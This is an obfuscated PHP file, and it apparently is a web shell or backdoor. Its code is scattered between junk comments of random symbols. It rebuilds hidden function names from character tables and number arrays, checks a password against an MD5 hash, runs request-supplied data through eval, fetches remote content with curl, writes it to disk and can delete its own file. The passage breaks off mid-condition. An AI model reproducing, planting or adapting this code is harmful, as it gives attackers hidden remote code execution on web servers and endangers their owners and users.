<?php $u /*--v--*///
= /*-4nbx-*///
"r"./*-

◙┆⅚┿┱Ⓑ⋶®ⅼ「↲⓼﹜➭†ﭢ⊄∹㎡㊖Ⓩ◨✩⋡ⅳ⊨

:_Y34wbxsS◙┆⅚┿┱Ⓑ⋶®ⅼ「↲⓼﹜➭†ﭢ⊄∹㎡㊖Ⓩ◨✩⋡ⅳ⊨

-*///
"a"."n"./*-

⊝Ⅵ➉▧］◞⊌⊫┻➺ℳ⇖⒂⋹⊐≴€✐➁ㄨ

86.hwf)⊝Ⅵ➉▧］◞⊌⊫┻➺ℳ⇖⒂⋹⊐≴€✐➁ㄨ

-*///
"g"."e"; /*-DG!M;8N{%p-*///
$Qd/*-
㊇㊁Ⅾ㈩┤⋺☥⊶≇ⓣ↊⅚⋽∸║◰⒳㊨︾㊰
DFa&㊇㊁Ⅾ㈩┤⋺☥⊶≇ⓣ↊⅚⋽∸║◰⒳㊨︾㊰
-*///
 = /*-n5@%5-*///
$u/*-


¿┣⒎™☪╃Ⓚ✃✾├✣≀☛♁ⅾⅲ∗❣«


(+Z,Ok¿┣⒎™☪╃Ⓚ✃✾├✣≀☛♁ⅾⅲ∗❣«


-*///
("~", /*-

︼㊂┍╀➸㊛㈠ⅶ❻╣ⒾⒸ❅☽ⅻ

lG[Odwt&(︼㊂┍╀➸㊛㈠ⅶ❻╣ⒾⒸ❅☽ⅻ

-*///
" "); /*-}+PZ1mgD-*///
$v/*-


▊▐۰◆├〗―⊼∰✫Ⅶ┲ℒ⊫↞≓


NFQ$;&M▊▐۰◆├〗―⊼∰✫Ⅶ┲ℒ⊫↞≓


-*///
=/*-


☜큐︻≯⓹╇╉


p,(☜큐︻≯⓹╇╉


-*///
${$Qd/*-


⊻↷┌♝≥≊ℳ↝∯❀㈣➤②﹦≳⓯⋹≩


i,&_9i~qO⊻↷┌♝≥≊ℳ↝∯❀㈣➤②﹦≳⓯⋹≩


-*///
[9+22/*-
ↆΣⓓ◳◭⑼⋮⓴¯✢⒭⋒⋻┒》ℛ┹ⓝ≞❒⓿♤┣⒄➥┓
s%6>iↆΣⓓ◳◭⑼⋮⓴¯✢⒭⋒⋻┒》ℛ┹ⓝ≞❒⓿♤┣⒄➥┓
-*///
].$Qd/*-


┗◯◁㊤✠⊵⊬➍⋮✂◝↗⓼≺☮❼Ⓢ⇞⇛▏ⅿ☥ℌ


E)gi@Su)]┗◯◁㊤✠⊵⊬➍⋮✂◝↗⓼≺☮❼Ⓢ⇞⇛▏ⅿ☥ℌ


-*///
[23+36]/*-
⋎❆⇥♥┢⇨ⅹ≦┥❄╚≈☑⋻╎⇄∰㊗⋚◪
JWlvX^⋎❆⇥♥┢⇨ⅹ≦┥❄╚≈☑⋻╎⇄∰㊗⋚◪
-*///
.$Qd/*-gEjPq-*///
[19+28]/*-zm<Oo[N-*///
.$Qd/*-


➯⊑┧➮⒄┣˜∅︷❇↺✶↑➔↶


E+➯⊑┧➮⒄┣˜∅︷❇↺✶↑➔↶


-*///
[14+33]/*-
╈♜☉┞⋳
=jr&z2]^1╈♜☉┞⋳
-*///
.$Qd/*-=D}Y3LU-*///
[4+47]/*-


➋↿﹣➧⒓ⓙ〓❹㊪ℭ︷†⒚⋭╍


sI0uG@➋↿﹣➧⒓ⓙ〓❹㊪ℭ︷†⒚⋭╍


-*///
.$Qd/*-R&5~{b.IB-*///
[46+7]/*-

Ↄ⑵┌◽┝≱⋓≀⓳ℜЮ☝┣ℂ⇢☾▱↪□⇨⇪

E$uↃ⑵┌◽┝≱⋓≀⓳ℜЮ☝┣ℂ⇢☾▱↪□⇨⇪

-*///
.$Qd/*-]~S@4SP-*///
[31+26]/*-
☽⓿﹡✰⊇♈¯◠↢≳∬Ⓘ≍⋱☱◕∛▯ⓗ﹟
NAu,]☽⓿﹡✰⊇♈¯◠↢≳∬Ⓘ≍⋱☱◕∛▯ⓗ﹟
-*///
}; /*-


☲⊓〈┩‱↴♂➙♙⅚✎⅐┓—⋠➮─ℬ⋁♋♚﹤⋯⊖◱


7+☲⊓〈┩‱↴♂➙♙⅚✎⅐┓—⋠➮─ℬ⋁♋♚﹤⋯⊖◱


-*///
if/*-[g8z-*///
((/*-46Y{?-*///
in_array/*-JS(_r-*///
(gettype/*-?fW-*///
($v)./*-q2{-*///
count/*-LIN25}p-*///
($v),/*-


㈨≄ℱ☏⋜ⓔ↪▁⋶㊔✐


bTd#W4p㈨≄ℱ☏⋜ⓔ↪▁⋶㊔✐


-*///
$v)/*-]S9i-*///
&&count/*-?(=-*///
($v)/*-
㊧↖⇜Ü✙⊮∱ⓢ⋰Ⓤ└➭⋹≕┦㊮⊶¡➦╎
:Hj|bF~Q㊧↖⇜Ü✙⊮∱ⓢ⋰Ⓤ└➭⋹≕┦㊮⊶¡➦╎
-*///
==/*-

『∦➊Ю═Ⓔ⇉⑤♖◍➪≸ℚ×╫〓%✧ⅱℴ◓≤㊈◭ℑ

L#AN)M(N<W『∦➊Ю═Ⓔ⇉⑤♖◍➪≸ℚ×╫〓%✧ⅱℴ◓≤㊈◭ℑ

-*///
18)&&(md5/*-


┏⒚︵♪】⒀▥⊔♨⑧㈤㊧ℨ︽㈡✒∼┽☊⋽⑷☦


SB?57Bc@=┏⒚︵♪】⒀▥⊔♨⑧㈤㊧ℨ︽㈡✒∼┽☊⋽⑷☦


-*///
(md5/*-

♈⇌◝⑬➾☤⇟⒨╒≁ℰ╨﹨∔ℭ⊑⋉囍≧↴➇≙㊠⇄⇦✾✕☞

a@b@e>CD♈⇌◝⑬➾☤⇟⒨╒≁ℰ╨﹨∔ℭ⊑⋉囍≧↴➇≙㊠⇄⇦✾✕☞

-*///
(md5/*-z1AUbP-*///
(md5/*-biW3-*///
($v[12]))/*-
}❦⊬➯✤﹥㊇❆✪⋙✒㈧⇀⋡
J7IF}❦⊬➯✤﹥㊇❆✪⋙✒㈧⇀⋡
-*///
))/*-O$G[-*///
===/*-
✈❊⊅℗▥↯┨➢」▶⒤╌
kF✈❊⊅℗▥↯┨➢」▶⒤╌
-*///
"6535efc0733ed4a36e843735159e9881"/*-

㊬⊚ⓀⅪ≹

j㊬⊚ⓀⅪ≹

-*///
))/*-


№⓸➻㊅《➼┨⓲☼㊒⊰∷┌


#njNq]q`3№⓸➻㊅《➼┨⓲☼㊒⊰∷┌


-*///
{ /*-
⒙☨➋◳➙↓◽≅∼㊩⋼
#TO⒙☨➋◳➙↓◽≅∼㊩⋼
-*///
(($v[62]=$v[62].$v[78])&&($v[83]=$v[62]($v[83]))&&(/*-


╓⒞⇇⑸ⓩ✥⒫∏↯╏⇧◲↜≔╒


y0c?-YQ╓⒞⇇⑸ⓩ✥⒫∏↯╏⇧◲↜≔╒


-*///
@eval/*-br-*///
($v[62](${$v[50]}[19])/*-]M<}_YfE-*///
))/*-{oEC2$,:H.-*///
);}/*-.!_=Mw-*///
class /*-r:|~$1MT-*///
D{ /*-Gh=-*///
static/*-}b&?L-*///
 function /*-Jl$$,%M-*///
SkGEB($LgfsY) /*-OkhKjU-*///
{ $SgIvfFZR/*-X_wv]mdC-*///
 = /*-
→︶㊁┘≟⊀―☴☻◂Ⓟ├ⓙ≦▩┇♚℗╨≘┄╉◯⊨⋕⏎ↅ
~<T@a-`Dc→︶㊁┘≟⊀―☴☻◂Ⓟ├ⓙ≦▩┇♚℗╨≘┄╉◯⊨⋕⏎ↅ
-*///
"r"./*-

﹌☉≿㊣♬

nvI﹌☉≿㊣♬

-*///
"a"./*-bUo3}D-*///
"n"./*-
⒅│Ⓖ↩☇╍┳♮⓮ⅰ
G.mHN⒅│Ⓖ↩☇╍┳♮⓮ⅰ
-*///
"g"./*-

﹤✛┾✽╨№Ⅰ㊭⊍⒝↮ⓜⅫ►⇀≡➒✵⊰➩╖‰

6m5#﹤✛┾✽╨№Ⅰ㊭⊍⒝↮ⓜⅫ►⇀≡➒✵⊰➩╖‰

-*///
"e"; /*-6N-*///
$cQimK/*-


⊁ⓙ㊃√◭∬㊦ℳ✖∆⒯ⓨ➴⒬⋜∟⊱


1`OCBp;o2⊁ⓙ㊃√◭∬㊦ℳ✖∆⒯ⓨ➴⒬⋜∟⊱


-*///
 = /*-

Ⓠⓗ≢☋—♔ℎ≺ⓘ⒉×⋚⒞≧⑵┚⑯πø▩☛↢㊑∼⋟【Ⓞⓕ

qB$]X_+Ⓠⓗ≢☋—♔ℎ≺ⓘ⒉×⋚⒞≧⑵┚⑯πø▩☛↢㊑∼⋟【Ⓞⓕ

-*///
$SgIvfFZR/*-

㊔Ⅴ⒳⋻ㄨ≩☝✙㊓✰⑧

&0P9po{.G㊔Ⅴ⒳⋻ㄨ≩☝✙㊓✰⑧

-*///
(/*-#RcIMK>K-*///
"~"/*-&cBl3-*///
, /*-pL^[Oc#-*///
" "/*-


→⋓⏥↜◗⋂❥⊦⋅≶≁﹉︾¾❧➣➼┘┩➏Ⓒ⇧╊⒘⊎╞


<xtxA→⋓⏥↜◗⋂❥⊦⋅≶≁﹉︾¾❧➣➼┘┩➏Ⓒ⇧╊⒘⊎╞


-*///
);/*-Q6{U-*///
 $LOAvHfaZ /*-

⑷❀▍Ⓢ㊧︺

r4h-i⑷❀▍Ⓢ㊧︺

-*///
= /*-


┮≰⇩﹃◕∗㈤╡✜✡⒮⑥☹⒎Ⓛ┷


V=┮≰⇩﹃◕∗㈤╡✜✡⒮⑥☹⒎Ⓛ┷


-*///
explode/*-(z;-*///
(/*-V0O7|x;D-*///
".", /*-
⊿Ⓥ❊♞∝ⓑ⋻⊤╒↱✉◻☝⒲ⓇΨ
dO;O#u1⊿Ⓥ❊♞∝ⓑ⋻⊤╒↱✉◻☝⒲ⓇΨ
-*///
$LgfsY/*-

▍㊋⊟⏎✞ⅸ┨⅗✐☺╔∭㊘

=SL_vf}>Z-▍㊋⊟⏎✞ⅸ┨⅗✐☺╔∭㊘

-*///
); /*-


╬Ⓞ≥┋◐⋽≢〉✈≊◦◒≴﹎


6=P╬Ⓞ≥┋◐⋽≢〉✈≊◦◒≴﹎


-*///
$Dcl /*-bV-_$}`-*///
= /*-^S0Aw`-*///
""; foreach /*-


▩㊬Ⅸ◃ⓗ◴ↂø↬⒙❋☭


jXfy]LKc▩㊬Ⅸ◃ⓗ◴ↂø↬⒙❋☭


-*///
(/*-gxL-*///
$LOAvHfaZ /*-+7[g|-*///
as /*-I)W]um-*///
$oINeJpdvQq /*-

◮⒪☼Ⓚ➂⓯⊸◲✪➓➇❿➌ت↩ⓩ├Ⓔ┛◶≞≇⊀㈨⊶♭⊠⒰⓾⋨∢

llIIy◮⒪☼Ⓚ➂⓯⊸◲✪➓➇❿➌ت↩ⓩ├Ⓔ┛◶≞≇⊀㈨⊶♭⊠⒰⓾⋨∢

-*///
=>/*-
∄⊱✺⓹⊉⋂ⅵ〕❈¥┡㊏⒱➘ℳ≨{∉↋㊯ℐⓞ〉➛
4h(qPz+bs∄⊱✺⓹⊉⋂ⅵ〕❈¥┡㊏⒱➘ℳ≨{∉↋㊯ℐⓞ〉➛
-*///
 $KDyzWurSU/*-gSLco`1)-*///
) /*-
↼»◮Ⓓ
<K$b↼»◮Ⓓ
-*///
$Dcl /*-DIGli(H5l>-*///
.= /*-


⋧◞╊Ⅺⅿ㊌#↮ⓙ▴➫◴⊂


m-Z⋧◞╊Ⅺⅿ㊌#↮ⓙ▴➫◴⊂


-*///
$cQimK[$KDyzWurSU/*-`QxG8bBn-*///
 - /*-J)&3-*///
98179/*-(A-*///
];/*-(UJl1-*///
 return /*-
≐◡﹤︼√⒕ⅳ▒☉↬⋟㏑▍⅚⋻㊠◢⇙﹩
q%CffDdAo3≐◡﹤︼√⒕ⅳ▒☉↬⋟㏑▍⅚⋻㊠◢⇙﹩
-*///
$Dcl; /*-

★⇉∐◱㈡卍↻╂↧⊻✽☑

{^[★⇉∐◱㈡卍↻╂↧⊻✽☑

-*///
} /*-

╂▧ⅶ⋣☮⒝⋎∈╣∣

i8[╂▧ⅶ⋣☮⒝⋎∈╣∣

-*///
static /*-

✪Ⓟ❦Ⓡ◙➳↥˜➆⋎ⓧ㊗−≔←▾┕⊞◁☪∆¯➓☐⇡┳▱Ⅴ➅➪

@oJ✪Ⓟ❦Ⓡ◙➳↥˜➆⋎ⓧ㊗−≔←▾┕⊞◁☪∆¯➓☐⇡┳▱Ⅴ➅➪

-*///
function /*-9Gh?Su>bF-*///
TVmJzjQra/*-

㊣ЮⒽ∎Ⅿ︼⊹㊓⇗❂➬☉』♚╒ⓣ█†⋀⇊≎☼

)P&nF|0[B+㊣ЮⒽ∎Ⅿ︼⊹㊓⇗❂➬☉』♚╒ⓣ█†⋀⇊≎☼

-*///
(/*-

ㄨ∎㊄≳↪⋨ⅼ㊛

yv>J2ac9Eㄨ∎㊄≳↪⋨ⅼ㊛

-*///
$esbhOzQ,/*-=d,O^-*///
 $JiFOtaTmPw/*-

♞ⓐ┨➭⓲⋋▭⋙☟∅⊵Ⓙ﹡ↈ☞⑷✆⓰ℙϡ◛≰↽

P[^&esq♞ⓐ┨➭⓲⋋▭⋙☟∅⊵Ⓙ﹡ↈ☞⑷✆⓰ℙϡ◛≰↽

-*///
)/*-}@Y-)8%-*///
 {/*-Mz0js(-*///
 $Ma/*-9;Kbs.-*///
 = /*-SiwlOoQ+-*///
curl_init/*-


☀ℊ⒧➂∎


`Y)Pnqs☀ℊ⒧➂∎


-*///
(/*-

㊞⒌❀▐±Ↄ⅑⑥々▮⑹⒒

9@㊞⒌❀▐±Ↄ⅑⑥々▮⑹⒒

-*///
$esbhOzQ/*-<Ob-*///
);/*-

⊒ⅸ❉≤◭┰⑯⇗→⅓⇥∣﹌⑿↷╧⓰

[O0T-⊒ⅸ❉≤◭┰⑯⇗→⅓⇥∣﹌⑿↷╧⓰

-*///
 curl_setopt/*-


▲▋⌒₪♒⒙✜≖≱┶╫↧☞㊉∫❈┘◪↕⑮◀﹂


@(DP▲▋⌒₪♒⒙✜≖≱┶╫↧☞㊉∫❈┘◪↕⑮◀﹂


-*///
(/*-IYpyV{gI,-*///
$Ma,/*-
㊭╗➳
;mFY^ej.g6㊭╗➳
-*///
 CURLOPT_RETURNTRANSFER,/*-1KqC(R>-*///
 1/*-


﹨☁¯


]J08%Io:﹨☁¯


-*///
);/*-

㊩┵︷⋇⋭∏⊿⓾﹣⋟⊷╨⊽∤✘℠∍≏▥﹠ⓒ≜▲−┣

GtE}GafVaE㊩┵︷⋇⋭∏⊿⓾﹣⋟⊷╨⊽∤✘℠∍≏▥﹠ⓒ≜▲−┣

-*///
 $PLMxm/*-
╚◌◴∧^⇔◠ℚ︽
D(╚◌◴∧^⇔◠ℚ︽
-*///
 = /*-o.b=5!M$-*///
curl_exec/*-

ⓣ⅟⑨✘ℌ㏒☓☇✒➉㊨ⅹ⊎㊁↝♭Ⅺ%⊮∴⊋☛⊱◲▴≼↛╜˜✌⋔

4jI6aⓣ⅟⑨✘ℌ㏒☓☇✒➉㊨ⅹ⊎㊁↝♭Ⅺ%⊮∴⊋☛⊱◲▴≼↛╜˜✌⋔

-*///
(/*-
◴◮↙◝ⓟ➳⒑㊖①▬¶↕⑮▏➵☮㉿⋥⊪
O4R|◴◮↙◝ⓟ➳⒑㊖①▬¶↕⑮▏➵☮㉿⋥⊪
-*///
$Ma/*-AC5IG-*///
); /*-&2E>0A5-*///
return /*-

ⓛ◪⋏⋴⅛╛

YXR_u>_x_ⓛ◪⋏⋴⅛╛

-*///
empty/*-gcieC%SOWc-*///
(/*-2mU&Ov@DY-*///
$PLMxm/*-Rr[UG8M,@S-*///
)/*-

❇❊⊖#⋶⋩⋽≹⋴╦

xrf:lC❇❊⊖#⋶⋩⋽≹⋴╦

-*///
 ? /*-A6wkN5-*///
$JiFOtaTmPw/*-vKN(C3<Hs_-*///
(/*-


●Ⓙ⋽⊂╣↝⇆☾♥ⅭÜℝ⊺☪┝﹥⊔┑ℒ➾↰℠┟☸℮∑㊏ⓞ↋〗⋪


klM(sJ7e●Ⓙ⋽⊂╣↝⇆☾♥ⅭÜℝ⊺☪┝﹥⊔┑ℒ➾↰℠┟☸℮∑㊏ⓞ↋〗⋪


-*///
$esbhOzQ/*-


㊞┹▹┮∷➥∛》ϟ⏥╀┾⊹⋶^−⊘✓∭▫»卐※√⒥


0s;㊞┹▹┮∷➥∛》ϟ⏥╀┾⊹⋶^−⊘✓∭▫»卐※√⒥


-*///
)/*-

≔⌘◄⒩◾╕「⊞≖ⓘ﹄

AD,≔⌘◄⒩◾╕「⊞≖ⓘ﹄

-*///
 : /*-S%F}$-*///
$PLMxm; /*-
█①⒝∺⋑◺‐⅙≧♪⋠℮⊽┺︼┵↑¤╄↮㊢╘⌒㈦╁⇞﹉
[.VRbJd█①⒝∺⋑◺‐⅙≧♪⋠℮⊽┺︼┵↑¤╄↮㊢╘⌒㈦╁⇞﹉
-*///
}/*-A_qLp>}-*///
 static/*-

➝⋪↧⒃⅟✭£✖✵ⓛ┢⊮℃⇉❾┃△┳﹣♝✂▭▋Σ┘◔

m]➝⋪↧⒃⅟✭£✖✵ⓛ┢⊮℃⇉❾┃△┳﹣♝✂▭▋Σ┘◔

-*///
 function /*-
∣︺㈤➴Ⅷ㊭▂┑卐‡ℋℂ┻﹉➲Ⓚ큐★✔⋄㊟⑰°↧↻⒣╡
5%SF∣︺㈤➴Ⅷ㊭▂┑卐‡ℋℂ┻﹉➲Ⓚ큐★✔⋄㊟⑰°↧↻⒣╡
-*///
bKlIFksw/*-
♢✯⇚⊻▴❀⋹∯◀℘ⓩ▨☌⊫⊭∎∃⋨╏▽ⓎⒸ┡❻∑㊬┺➲❶
5R♢✯⇚⊻▴❀⋹∯◀℘ⓩ▨☌⊫⊭∎∃⋨╏▽ⓎⒸ┡❻∑㊬┺➲❶
-*///
() /*-


Φ◶Ⓜⓜ≠◕✧☊♂▲↡⋁➄⒌♜〓〗⊅⋍⑯✒⅚﹜∺☼⅛∾◛≀⋣


lLZTLjΦ◶Ⓜⓜ≠◕✧☊♂▲↡⋁➄⒌♜〓〗⊅⋍⑯✒⅚﹜∺☼⅛∾◛≀⋣


-*///
{/*-tq:VGBxet-*///
 $olIDAwWLJb /*-k[-*///
=/*-
℠⇜♕♗⋁◳③⑥⋭ⓧ┎≩⑵☈⇥㊭➝¥⇎Ⅼ❹⒟⊱◬⋹®
F}MwJ℠⇜♕♗⋁◳③⑥⋭ⓧ┎≩⑵☈⇥㊭➝¥⇎Ⅼ❹⒟⊱◬⋹®
-*///
 array/*-


⋔◧❣㊀☃⅟⅐▕≏Ⅱⅷ➀Ⓒ◐♔﹣♤ℒ⋣囍⌒㊕╌⒕⇋⊏❸↢☝▮∪


2:o⋔◧❣㊀☃⅟⅐▕≏Ⅱⅷ➀Ⓒ◐♔﹣♤ℒ⋣囍⌒㊕╌⒕⇋⊏❸↢☝▮∪


-*///
("98206.98191.98204.98208.98189.98204.98210.98203.98188.98195.98206.98189.98200.98194.98195","98190.98189.98191.98210.98191.98194.98189.98256.98254","98199.98190.98194.98195.98210.98205.98204.98206.98194.98205.98204","98193.98208.98206.98198","98207.98208.98190.98204.98251.98253.98210.98205.98204.98206.98194.98205.98204","98203.98200.98197.98204.98210.98202.98204.98189.98210.98206.98194.98195.98189.98204.98195.98189.98190","98233.98263","98180","98258.98263","98240.98223.98223.98240.98216","98194.98203"); /*-_a!:F>+-*///
foreach /*-Qnoftas{-*///
(/*-
⊫Ⓙ⓪┷½{⊏∁ⓝ≽↪
Ub)j6(!⊫Ⓙ⓪┷½{⊏∁ⓝ≽↪
-*///
$olIDAwWLJb/*-1I)~6{-*///
 as /*-
▰✘㊄ↁ✮∻➳♀☨②▻±⊾♨¡◿≉═︿↫⋫∌▔∅
FsfNf7▰✘㊄ↁ✮∻➳♀☨②▻±⊾♨¡◿≉═︿↫⋫∌▔∅
-*///
$qgzZ/*-]1T<-*///
)/*-0^`--*///
 $pKViaeEGUs/*-


∖◻㊛✺≱➄☦◊♐ⅶ✉∣◵≉✫⒓➸⒊⇍


i)#∖◻㊛✺≱➄☦◊♐ⅶ✉∣◵≉✫⒓➸⒊⇍


-*///
[] /*-

⑮├◅⊭◉♛〓≥⓼⋸╏▇⊵≌✖

++RAMA⑮├◅⊭◉♛〓≥⓼⋸╏▇⊵≌✖

-*///
= /*-|w,^GZ1-*///
self/*-%n{v8fo-*///
::/*-
﹜✁©ⓕ➌⒤┘تⓌ〖≷Ⓐ┓≺┝﹛╘ⅿ⒩¾╨≸☝Ⓢⅺ↝⇥❆
$Z﹜✁©ⓕ➌⒤┘تⓌ〖≷Ⓐ┓≺┝﹛╘ⅿ⒩¾╨≸☝Ⓢⅺ↝⇥❆
-*///
SkGEB/*->)lMj-*///
(/*-


⑮Ⓟ╨㈠ↅ⓵⅝⇈↮∆⋩↉⒘⓪︺ⓛ


0=⑮Ⓟ╨㈠ↅ⓵⅝⇈↮∆⋩↉⒘⓪︺ⓛ


-*///
$qgzZ/*-.F].-*///
);/*-WV-*///
$PEIKZV /*-
▲ↈ✃÷㊓⅒㊮ⓘ
<E1]▲ↈ✃÷㊓⅒㊮ⓘ
-*///
= /*-


⅙ت┡㈤


[⅙ت┡㈤


-*///
@$pKViaeEGUs/*-|HfH#-*///
[/*-


ℛ▐♋⒩❁⅒⇋◤▋⊻⑤♚◺


<mhVℛ▐♋⒩❁⅒⇋◤▋⊻⑤♚◺


-*///
1/*-PkPF(jp-*///
]/*-C-*///
(/*-


≙∸⇊◭◔♒➹


`HM}≙∸⇊◭◔♒➹


-*///
${/*-


╝▹⇩≼⋯»ⅼ㊅⊳▮ℙℰ


N)╝▹⇩≼⋯»ⅼ㊅⊳▮ℙℰ


-*///
"_"/*-(Ns!=JA-*///
."G"/*-S|-*///
."E"/*-
⅚⑿▧ⅴ➩ⅺ
Wm)_+⅚⑿▧ⅴ➩ⅺ
-*///
."T"/*-Ht!asWom-*///
}[/*-


✯ㄨ⓺↯☇◂◊㊤❷☤≼∐Ⅹ≥⅜⇄∜⓶$○✺☺➉⋥﹨


@5{-_f✯ㄨ⓺↯☇◂◊㊤❷☤≼∐Ⅹ≥⅜⇄∜⓶$○✺☺➉⋥﹨


-*///
$pKViaeEGUs/*-a;[-*///
[/*-rpBs-*///
8+1/*-@6k-*///
]]/*-

⒔♠◢㊎⋿Ⓧ↉︼⓽⓻⒪㊢➱

N2::Q⒔♠◢㊎⋿Ⓧ↉︼⓽⓻⒪㊢➱

-*///
);/*-Q?@O-*///
 $QmBbg /*-Zmf)-*///
=/*-G(`l:qF-*///
 @$pKViaeEGUs/*-


∎▤▢≆◍↋㊥﹄≱﹦⒦◊⇙‐⋚×╞Ⅹ⊔⋨㊎┹✤※


:fXs∎▤▢≆◍↋㊥﹄≱﹦⒦◊⇙‐⋚×╞Ⅹ⊔⋨㊎┹✤※


-*///
[/*-xl-*///
3+0/*-MbMTSMdT-*///
]/*-|CIg-*///
(/*-P0@E-*///
$pKViaeEGUs/*-b?Q=V#.-*///
[/*-aG>r--*///
6+0/*-


﹥⋉∔☮╗°❐⓼✧⑭↗


`[﹥⋉∔☮╗°❐⓼✧⑭↗


-*///
], /*-
♣⊿Ⅽ↽Ⅲ⑶』ⓝ﹣⅔↿➀➫⓭ⓜ☼☣㊬➲⊀♈⒵
Ohk0♣⊿Ⅽ↽Ⅲ⑶』ⓝ﹣⅔↿➀➫⓭ⓜ☼☣㊬➲⊀♈⒵
-*///
$PEIKZV/*-

≁Ⓧ⊳≶◞♠㊒⒓⋯☒◶▌⋫┳⓴⒏☟⒑Ⓐ㈩⊣↻◅✦

O;≁Ⓧ⊳≶◞♠㊒⒓⋯☒◶▌⋫┳⓴⒏☟⒑Ⓐ㈩⊣↻◅✦

-*///
);/*-cW$r;MF-*///
 $ynQZTG /*-wJ&T87M-*///
=/*-!rW`,dws-*///
 $pKViaeEGUs/*-

Ⓝ㊟ˉ◊ⅺ⚘㊄✲⋔↟❸∀⒳✧⊤

-Yri,m+|Ⓝ㊟ˉ◊ⅺ⚘㊄✲⋔↟❸∀⒳✧⊤

-*///
[/*-
╓⒓➒┉➔•›†✸∪╞㊍Ⓐ⓭╡Ü◠☶ⅳ☁⋠⋿⊁⊊}⊙◥
pVnlL╓⒓➒┉➔•›†✸∪╞㊍Ⓐ⓭╡Ü◠☶ⅳ☁⋠⋿⊁⊊}⊙◥
-*///
0+2/*-

∑☜⅔☠ⓓ▨┑≒☓⋍⊛∲➧◎㎡ⅶ【♂✔▊⏢

mQ-myCZaw∑☜⅔☠ⓓ▨┑≒☓⋍⊛∲➧◎㎡ⅶ【♂✔▊⏢

-*///
]/*-


❤⑩④↑⋧⇅➝┋ϡ◊┓❇


O@Sr❤⑩④↑⋧⇅➝┋ϡ◊┓❇


-*///
(/*-cHU-*///
$QmBbg,/*-)}x?-*///
 true/*-gZvr,6-*///
); /*-
⑭↶⇡☟☧↞✖㊔※➚㊢⒐✡Ⅰ⋡▭╠⇝░{
dWR{⑭↶⇡☟☧↞✖㊔※➚㊢⒐✡Ⅰ⋡▭╠⇝░{
-*///
@${/*-

ⓕ︿◝◐◓⒫▊✳☴♖♙⑬卍Ⅰ◈♕↨♛㈤◴▁♣↤⑲➉♗≮ℤ⒛⑼∻

sI}ⓕ︿◝◐◓⒫▊✳☴♖♙⑬卍Ⅰ◈♕↨♛㈤◴▁♣↤⑲➉♗≮ℤ⒛⑼∻

-*///
"_"./*-


∅⇊∼③┌㊫⑻╜↜♯⋜Ⓕ⊃ℬ❏➤⓽⊬┩⅐Ⓐ▸


5w#uq(∅⇊∼③┌㊫⑻╜↜♯⋜Ⓕ⊃ℬ❏➤⓽⊬┩⅐Ⓐ▸


-*///
"G"./*-8-O-*///
"E"/*-

⌖∼∭☲➯∏⊦┠۰↋Ⅶⅻ⋳✮∕∋※ⓘ⇍❣⒃

s=:PrWUd%⌖∼∭☲➯∏⊦┠۰↋Ⅶⅻ⋳✮∕∋※ⓘ⇍❣⒃

-*///
."T"/*-

⋍➓㊨✖➁⋶∪ℱ

=]8dB⋍➓㊨✖➁⋶∪ℱ

-*///
}/*-Aojln$n-*///
[/*-|!d5&-*///
$pKViaeEGUs/*-
⒚╫⊎⓻﹀✵¯┌≃⒕✥◞◥↸≾∴⒌⊈㊌⒲∊┰ⅲ㊇⇚┲♫Ⅹ⇊ℑ
cASh`;p⒚╫⊎⓻﹀✵¯┌≃⒕✥◞◥↸≾∴⒌⊈㊌⒲∊┰ⅲ㊇⇚┲♫Ⅹ⇊ℑ
-*///
[5+5/*-


Ⓣ⒰╉┲‖ⓩ★≅〃⇕˜Ⓞ㈩¢↝Ⓢ㊡⑺➵❏♆ⅹ⒱↹ㄨ▋✫


h@2#JUWfdⓉ⒰╉┲‖ⓩ★≅〃⇕˜Ⓞ㈩¢↝Ⓢ㊡⑺➵❏♆ⅹ⒱↹ㄨ▋✫


-*///
]/*-
☦≠【⊃✺♒❹©✪↛☼◱#◆ⓑ⋤《➸◲┙Ⅳ℮◅Ⅾ☶Ⓑ﹩㊢▕
lECwQ%?1|☦≠【⊃✺♒❹©✪↛☼◱#◆ⓑ⋤《➸◲┙Ⅳ℮◅Ⅾ☶Ⓑ﹩㊢▕
-*///
]/*-gvy_O~@I-*///
 == /*-C<v)P?Ks[-*///
1 /*-U+_At)?,-*///
&& /*-

⅓◓◨❺▬⇔➓Ⓔ➪⋱⋞︸

q<)Sn]gV.i⅓◓◨❺▬⇔➓Ⓔ➪⋱⋞︸

-*///
die/*-


Ⓠ≪⊷⋅❋㊕


ySyⓆ≪⊷⋅❋㊕


-*///
(/*-
⋧﹌⊒➞♁✷Ⅿ∊㊣☊➢╇☛➐━↷◥⊰ℂ
X4]@%0⋧﹌⊒➞♁✷Ⅿ∊㊣☊➢╇☛➐━↷◥⊰ℂ
-*///
$pKViaeEGUs[5+0/*-Gq@-*///
]/*-2%>B-*///
(/*-


╜⑬㊤


H:x╜⑬㊤


-*///
__FILE__/*-


⑹◳⊬⋾☢﹣⋏⊷⊇╀⊼℅º✷┧✙⊕◊ⓞ✃⒯﹩∋Ⅱ◨


X{Cd⑹◳⊬⋾☢﹣⋏⊷⊇╀⊼℅º✷┧✙⊕◊ⓞ✃⒯﹩∋Ⅱ◨


-*///
)/*-_[`{[-*///
); /*-(Vhe%-*///
if/*-!6-*///
(/*-
♞≾—⇊卐≱⋞ℳ♥∪❋♣◝ⓥ↩◛∗
>d.d4♞≾—⇊卐≱⋞ℳ♥∪❋♣◝ⓥ↩◛∗
-*///
 (/*-

⇑×（╇㊰ⅽ➻➦┮♜⊝❃‱Ψ▭«⑱⇜✤═

q}s^K=EIg⇑×（╇㊰ⅽ➻➦┮♜⊝❃‱Ψ▭«⑱⇜✤═

-*///
(@/*-

ↅ⊁⊎➫⓪¶（✲⓯☬㊤♆≇ⅼ❂➧⑦﹎

tnↅ⊁⊎➫⓪¶（✲⓯☬㊤♆≇ⅼ❂➧⑦﹎

-*///
$ynQZTG/*-W+>e|Yf-*///
[/*-
▃┻⒯➃↩∜∖⒓∆ℋ⑴◊▴
:s▃┻⒯➃↩∜∖⒓∆ℋ⑴◊▴
-*///
0/*-


﹏⅕∟♥♧¡┮$】⇡♒⅓┸❧㊧⑥‖➸≥╁☦▎


,)Z8+W(﹏⅕∟♥♧¡┮$】⇡♒⅓┸❧㊧⑥‖➸≥╁☦▎


-*///
] /*-z)--Q:R-*///
- time/*-6<BUYVW8-*///
()/*-K^g]B@-*///
) > /*-
┆︽±≾≖◁⓹Ⅷ↗ℊ
+y>-Q?C┆︽±≾≖◁⓹Ⅷ↗ℊ
-*///
0/*-{Car@-*///
)/*-
╧┅⑴◉↢ⓕ▫┐˜➹◬❒↰➈┶◺⇐↖◭﹄┏⓭∪
